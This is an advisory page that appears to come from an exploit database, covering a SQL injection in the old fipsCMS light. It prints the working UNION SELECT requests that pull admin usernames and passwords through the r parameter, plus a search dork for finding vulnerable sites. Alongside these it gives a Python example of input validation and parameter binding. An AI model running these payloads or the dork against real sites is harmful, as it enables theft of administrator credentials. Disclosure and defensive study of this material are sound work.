Vendor: fipsCMS light
By: U238
CVSS: 8.8 (HIGH)
Type: SQL Injection
CWE: 89
Product Name: fipsCMS light
Affected Version From: fipsASP 2003 - 2008
Affected Version To: fipsASP 2003 - 2008
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

fipsCMS light – © fipsASP 2003 – 2008

fipsCMS light (© fipsASP 2003 - 2008) is vulnerable to SQL injection: an attacker can inject SQL code into the application's queries. The published exploit requests are victim/path/home/index.asp?w=pages&r=9999999 union select all 0,username,null,0x1 from admin and victim/path/home/index.asp?w=pages&r=9999999 union select all 0,password,null,0x1 from admin. In both, the injected SQL follows the numeric value of the r parameter. The exploit was found by U238 and was published on milw0rm.com on 2008-07-26.

Mitigation:

Test the application for SQL injection vulnerabilities, and validate and sanitize all input before it is used in a SQL query.
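
The validation and parameter binding that the mitigation calls for, shown as an added example (not code from fipsCMS or from the advisory). Python's sqlite3 stands in for the CMS's ASP code and database; the pages table, its columns, the function names and the sample rows are constructed assumptions, and the r value is the one from the advisory's first request.

```python
import sqlite3

# Constructed stand-in for the CMS database. Only admin.username and
# admin.password come from the advisory; everything else is an assumption.
def make_db():
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE pages (id INTEGER, title TEXT, body TEXT, flag INTEGER);
        CREATE TABLE admin (username TEXT, password TEXT);
        INSERT INTO pages VALUES (1, 'Home', 'Welcome', 1);
        INSERT INTO admin VALUES ('constructed-admin', 'constructed-secret');
    """)
    return db

def get_page_vulnerable(db, r):
    # Before: the raw `r` value is concatenated into the statement, so any SQL
    # that follows the number becomes part of the query.
    sql = "SELECT id, title, body, flag FROM pages WHERE id = " + r
    return db.execute(sql).fetchall()

def parse_page_id(r):
    # Allow-list validation: `r` must be a short run of ASCII digits only.
    if not (r.isascii() and r.isdigit() and len(r) <= 9):
        raise ValueError("r must be a numeric page id")
    return int(r)

def get_page_hardened(db, r):
    # After: validate first, then bind the value as a parameter so it is only
    # ever compared as data and never parsed as SQL.
    page_id = parse_page_id(r)
    return db.execute(
        "SELECT id, title, body, flag FROM pages WHERE id = ?", (page_id,)
    ).fetchall()

# The `r` value from the advisory's first request, verbatim.
ADVISORY_R = "9999999 union select all 0,username,null,0x1 from admin"

if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", get_page_vulnerable(db, ADVISORY_R))
    print("hardened, r=1:", get_page_hardened(db, "1"))
    try:
        get_page_hardened(db, ADVISORY_R)
    except ValueError as exc:
        print("hardened, advisory value rejected:", exc)
```
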

Exploit-DB raw data:

Exploit Code:

victim/path/home/index.asp?w=pages&r=9999999 union select all 0,username,null,0x1 from admin

victim/path/home/index.asp?w=pages&r=9999999 union select all 0,password,null,0x1 from admin

http://localhost:2222/lab/cms/_admin

Download:http://login.fipsasp.com/File.asp?ID=60&CatID=5
Found By U238
# Exploit Search Find: ^o)
#
# fipsCMS light - © fipsASP 2003 - 2008. All rights reserved
#
# fipsCMS light - © fipsASP 2003 - 2008
#
# inurl:"fipsASP 2003 - 2008"
# ************************************************ 

# milw0rm.com [2008-07-26]